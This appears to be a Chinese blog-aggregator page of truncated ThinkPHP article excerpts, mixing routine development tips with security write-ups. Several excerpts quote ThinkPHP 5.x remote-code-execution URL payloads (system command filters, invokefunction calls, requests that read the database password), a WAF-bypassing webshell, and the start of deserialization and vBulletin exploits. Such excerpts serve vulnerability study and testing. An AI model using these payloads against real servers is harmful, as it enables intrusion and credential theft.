巴特西
首页
Python
Java
PHP
IOS
Andorid
NodeJS
JavaScript
HTML5
thinkphp rce汇总
Thinkphp5 RCE总结
thinkphp5最出名的就是rce,我先总结rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&c
thinkphp下的Webshell&;&;php过D盾一句话
环境: Thinkphp 5.0.15 PHP version:7.0.12 WAF: D盾 ,安全狗 Thinkphp 采用 MVC 模式 核心:模块 -> 控制器 –> 方法 思路:利用已经有的think 类包库 去做一些事情 利用已有的功能,顺便对D盾 绕过 方法: Payload1: http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[
vulstack红队评估(五)
一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户,改为了panda123.. Win2008: sun\admin 2020.com #由于需要改密码,我更改为panda666... ②虚拟机网卡设置 Win7双网卡模拟内外网: 外网:桥接模式与物理机相通 内网:根据公开截图是:192.168.138.136,仅主机模式 利用管理员账号
IT公司常见的内网漏洞表格
访问控制类漏洞与隐患 这一类漏洞与隐患属于访问控制与身份鉴别问题,一般有没有配置访问控制.访问控制弱(弱口令或者空口令),身份鉴别可以绕过等问题 漏洞协议组件 漏洞类型 漏洞评级 SSH 弱口令 严重 RDP 未授权.弱口令 严重 SMB 未授权(共享直接访问,不验证).弱口令 严重 FTP 匿名.弱口令 严重 Telnet 未授权.弱口令 严重 MySQL 未授权.弱口令 严重 PostgreSQL 弱口令 严重 MongoDB 未授权(不验证直接登录,可以增删改查).弱口令 严重 Redis
应用安全-CMF/CMS漏洞整理
CMS识别 云悉 http://whatweb.bugscaner.com/batch.html CakePHP CakePHP <= / Cache Corruption Exploit 2011-01 vBulletin CVE-- vBulletin .x 0day pre-auth RCE #POC #!/usr/bin/python # # vBulletin .x 0day pre-auth RCE exploit # # This should work on all versi
解决ThinkPHP关闭调试模式时报错的问题汇总
解决ThinkPHP关闭调试模式时报错的问题汇总 案例一: 最近用ThinkPHP开发一个项目,本地开发测试完成上传到服务器后,第一次打开正常,再刷新页面时就出现 "页面调试错误,无法找开页面,请重试"的错误. 明明本地设置define('APP_DEBUG', false) 运行没点问题,怎么放到服务器上就出错了昵? baidu,Google还是没有找到解决方案,突然发现项目APP_Name/Runtime/Cache目录和APP_Name/Runtime/Logs目录没有可写权限,
thinkphp 5.1框架利用及rce分析
前言 上个学期钻研web渗透的时候接触过几个tp的框架,但那时候还没有写blog的习惯,也没有记录下来,昨天在做ctf的时候正好碰到了一个tp的框架,想起来就复现一下 正文 进入网站,标准笑脸,老tp人了 直接先一发命令打出phpinfo(),因为是在打ctf有些地方我就没有仔细去看 index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]
【PHP ThinkPHP框架】小bug汇总[更新]
目录结构 1.函数调用 2.绑定select下拉框数据 3.PHP查询功能 4.格式化时间和价钱 5.IF标签比较两个变量 6.eq标签比较两个变量 7.新增信息或者修改信息的自动验证和自动填充 8.验证码 9.NotFound 10.字符串处理函数 11.单引号和双引号 最近开始接触PHP编程语言,遇到各种小问题,不断总结,不断进步.由于一开始就用上了ThinkPHP框架,所以不知道和一般的PHP项目有什么区别.有待研究. 1.函数调用 可能是因为我比较菜鸟,刚开始学习编写PHP页面,还没有写
***ThinkPHP中的常用方法汇总总结:M方法,D方法,U方法,I方法
thinkPHP中M()和D()的区别 在实例化的过程中,经常使用D方法和M方法,这两个方法的区别在于M方法实例化模型无需用户为每个数据表定义模型类,如果D方法没有找到定义的模型类,则会自动调用M方法.通俗一点说:M实例化参数是数据库的表名.D实例化的是你自己在Model文件夹下面建立的模型文件例如:$user = new UserModel();等价于$user = D('user');如果实例化的是一个空模型例如 $Demo = new Model();那么它等价于 $Demo = M();
Thinkphp远程代码执行 payload汇总
Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&funct
ThInkPHP验证码不显示,解决方法汇总
出现ThInkPHP验证码不显示的情况 官方提示如下:如果无法显示验证码,请检查:① PHP是否已经安装GD库支持:② 输出之前是否有任何的输出(尤其是UTF8的BOM头信息输出):(打开验证码文件为乱码,也有可能是BOM编码,可查看下方2寻找解决方法)③ Image类库是否正确导入:④ 如果是中文验证码检查是否有拷贝字体文件到类库所在目录: ⑤URL_MODEL模式,有些服务器不支持REWRITE . 针对上面的情况,一一检查 1.可以用phpinfo 查看GD库是否开启,phpinfo打印出
ThinkPHP 5.0.24 反序列化RCE (Windows下EXP)
直接上exp吧,Windows下. <?php namespace think\process\pipes; class Windows { private $files = []; public function __construct() { $this->files = [new \think\model\Merge]; } } namespace think\model; use think\Model; class Merge extends Model { protected $a
thinkphp中的内置操作数据库与mysql中的函数汇总
8.4.4 Model类getModelName() 获取当前Model的名称getTableName() 获取当前Model的数据表名称switchModel(type,vars=array()) 动态切换模型table() 设置当前操作的数据表field() 设置要查询的数据字段where() 设置查询或者操作条件data(data) 设置数据对象order(order) 设置排序limit(limit) 查询限制page(page) 查询分页join(join) 进行JOIN查询havin
Thinkphp 缓存RCE
5.0.0<=ThinkPHP5<=5.0.10 . 漏洞利用条件: 1.基于tp5开发的代码中使用了Cache::set 进行缓存 2.在利用版本范围内 3.runtime目录可以访问 扩展: 1.不可访问,可以考虑包含.前提要找到包含处.//Tp有一个Cache一个包含 2.利用缓存,做一个长期的shell动态生成. 漏洞原因:缓存名,可以预测,缓存内容用户可控. 造成漏洞代码 <?php namespace app\index\controller; use th
#ThinkPHP_3.2.2模型# where查询条件汇总
特别喜欢 ThinkPHP_3.2.3 框架的Model,结合官方手册及查看源代码,汇总出其大体用法: 核心转换方法: $this->parseWhere($where); $whereStr .= $this->parseThinkWhere($key, $val); $this->parseWhereItem($this->parseKey($key), $val); // 内连接.左连接.右连接 UserModel.class.php // SQL:( SELECT * FR
ThinkPHP 知识点链接
1.Thinkphp3.2 行为扩展和插件(Hook) http://www.thinkphp.cn/topic/21323.html 2.ThinkPHP3.1.3的单字母函数汇总 http://www.thinkphp.cn/topic/9688.html
ThinkPHP函数详解系列
为了能方便大家学习和掌握,在这里汇总下ThinkPHP中的经典函数用法 A 函数:实例化控制器R 函数:直接调用控制器的操作方法C 函数:设置和获取配置参数L 函数:设置和获取语言变量D 函数:实例化模型M 函数:实例化模型(无需定义模型类)N 函数:计数器G 函数:调试统计U 函数:URL地址生成I 函数:安全获取系统输入变量S 函数:缓存设置和存取F 函数:快速缓存设置和存取session函数:Session操作cookie函数:Cookie操作import函数:类库导入
PHP常见错误汇总
日常开发和调试的时候,经常会遇到一些错误,光怪陆离的不知所以,所以,特此将错误汇总一下,借鉴!!! 1. 原因分析: 一般可能是该文件出现了问题,检查一下代码和格式,是否出现开始的地方出现了空格,或者字符集非utf-8 例如: 2. 原因分析: 在解析XML数据的时候 报出的这个错误,使用函数 simplxml_load_string($xmlData); 之所以错误是因为: 在文件的最前端 即<?xml version="1.0" encoding="
linux下thinkphp取消调试模式后找不到网页解决方案
1.最大嫌疑是Runtime目录权限不足,导致common~runtime.php文件无法生成, 解决:1.整个Runtime目录删除,让系统重新生成; 2.给Runtime及以下的所有文件足够权限0755. 2.'URL_CASE_INSENSITIVE' =>false,原因不明,在LINUX下才用,可能是为了照顾Linux. 3.网上搜索如下: 解决ThinkPHP关闭调试模式时报错的问题汇总 投稿:hebedich 字体:[增加 减小] 类型:转载 时间:2015-04-22我要评论 本
Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目
Golang优秀开源项目汇总(持续更新...)我把这个汇总放在github上了, 后面更新也会在github上更新. https://github.com/hackstoic/golang-open-source-projects . 欢迎fork, star , watch, 提issue. 资料参考来源:http://studygolang.com/projects 监控系统 序号 名称 项目地址 简介 1 OpenFalcon http://github.com/open-falcon/
在Nginx上部署ThinkPHP,解决Pathinfo问题
在Nginx上部署ThinkPHP,解决Pathinfo问题 事实上.要解决nginx不支持pathinfo的问题.有两个解决思路,一是不使用pathinfo模式,二是改动nginx的配置文件,使它支持pathinfo. 为了使问题简单化,我选择了第一种方式.由于就另外一种方式,我查了非常多资料,发现大家的方法不尽同样.有的还区别非常大,easy造成误导,所以我选择从简出发,选择普通模式.尽管有一定的风险.当把index.php相应的前台代码改动完成之后.发现前台基本正常.但是后台仍然出现重定向
热门专题
QSpinBox cellWidget样式
LR参数化取值出现空
Quartz线程积累
centos war 404 报错模糊
idea live template 预定义函数
武沛齐 python
rabbitmq 防止消费数据丢失
golang 连接jdbc
个性化设置被系统管理员禁用
音频多线程 python
app内嵌vue多页面
Android 添加View到顶层
将cat 输出的文件内容 echo 到另一个文件里去
max pooling layer尺寸计算公式
Tengine管理端
python subprocess.popen 句柄无效
js字符串前4位截取
nginx文件服务器搭建
vcs 仿真 tcl
c#中enumchildwindows函数如何使用